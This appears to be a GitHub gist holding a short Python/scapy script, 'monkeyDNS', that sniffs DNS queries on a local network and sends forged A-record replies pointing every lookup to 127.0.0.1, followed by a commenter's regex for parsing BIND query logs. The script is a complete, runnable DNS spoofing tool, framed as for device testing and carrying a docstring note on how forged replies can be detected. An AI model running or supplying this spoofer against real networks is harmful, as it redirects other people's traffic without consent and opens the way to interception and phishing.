A simple mini DNS sniffer which tampers with responses over the local network
#!/usr/bin/python
"""
monkeyDNS: mini fake DNS server to tamper with a device's queries during testing.
Doesn't work against Google's DNS because its replies are too fast (the real answer arrives before the forged one)!
"""
import scapy, sys
from scapy.all import *
# Network interface used both for sniffing queries and for sending replies.
interface = "eth0"
# IPv4 address placed in the rdata of every forged A record.
fake_address = "127.0.0.1"
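def monkeyHandler(data):
    """Scapy ``prn`` callback: log a sniffed DNS question and forge an A reply.

    Every packet that carries a DNS layer with a question record is printed.
    When the question is a non-empty A lookup (qtype 1), a reply is built
    that swaps the query's addresses and ports, reuses its IP id and DNS
    transaction id, and answers with ``fake_address``.

    Packets lacking an IPv4 or UDP layer are skipped; ``getlayer`` returns
    ``None`` for a missing layer, which previously raised ``AttributeError``
    on the first attribute access and aborted the capture.

    Detection note: the genuine resolver still answers, so the client can
    receive two replies for the same transaction id. Conflicting answers
    for one id, an authoritative flag (aa=1) on a reply apparently coming
    from a recursive resolver, and a fixed TTL of 64 are what a monitor
    would see on the wire.

    Args:
        data: the packet handed over by ``sniff``.

    Returns:
        None, so ``sniff`` prints nothing on its own.
    """
    if not (data.haslayer(DNS) and data.haslayer(DNSQR)):
        return

    ip = data.getlayer(IP)
    udp = data.getlayer(UDP)
    # NOTE(review): the "udp dst port 53" capture filter presumably also
    # matches DNS carried over IPv6, which has no IP (IPv4) layer.
    if ip is None or udp is None:
        return

    dns = data.getlayer(DNS)
    dnsqr = data.getlayer(DNSQR)
    print('[Sniff][id:%s] QR(%s) ? %s ( %s > %s )'
          % (dns.id, dnsqr.qtype, dnsqr.qname, ip.src, ip.dst))

    # Only A questions with a non-empty name are answered.
    if len(dnsqr.qname) != 0 and dnsqr.qtype == 1:
        response = DNSRR(rrname=dnsqr.qname, type='A', rclass='IN', ttl=64,
                         rdata=fake_address)
        # Mirror the query: source and destination are swapped and both
        # the IP id and the DNS transaction id are copied from it.
        forged = (IP(id=ip.id, src=ip.dst, dst=ip.src)
                  / UDP(sport=udp.dport, dport=udp.sport)
                  / DNS(id=dns.id, qr=1, rd=1, ra=1, aa=1, tc=0, rcode=0,
                        qd=dnsqr, an=response))
        send(forged, verbose=0, iface=interface)
        # The addresses logged here are those of the original query, not of
        # the forged reply (which travels in the opposite direction).
        print('[Ooook][id:%s] RR ! %s ( %s > %s )'
              % (dns.id, dnsqr.qname, ip.src, ip.dst))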
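# Script entry: announce the record being served, then sniff DNS queries
# until interrupted with Ctrl-C.
try:
    # NOTE(review): the banner advertises TTL 60 while monkeyHandler builds
    # its record with ttl=64 - confirm which value is intended.
    print('monkeyDNS: domain.tld. 60 IN A %s' % fake_address)
    while True:
        # store=0: the captured packets were never read back, so keeping
        # them only grew memory for as long as the capture ran.
        sniff(filter="udp dst port 53", iface=interface, prn=monkeyHandler,
              store=0)
except KeyboardInterrupt:
    # The original bare `exit` was a no-op expression; exit explicitly.
    sys.exit(0)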

corifeo commented Feb 6, 2013

^(\d{2}-\w{3}-\d{4}\s+\d{2}:\d{2}:\d{2}.\d{3})\s+client\s+(\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3})#\d+:\s+query:\s+(.*)\s+IN\s+(\w+)\s++\s+((\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}))$
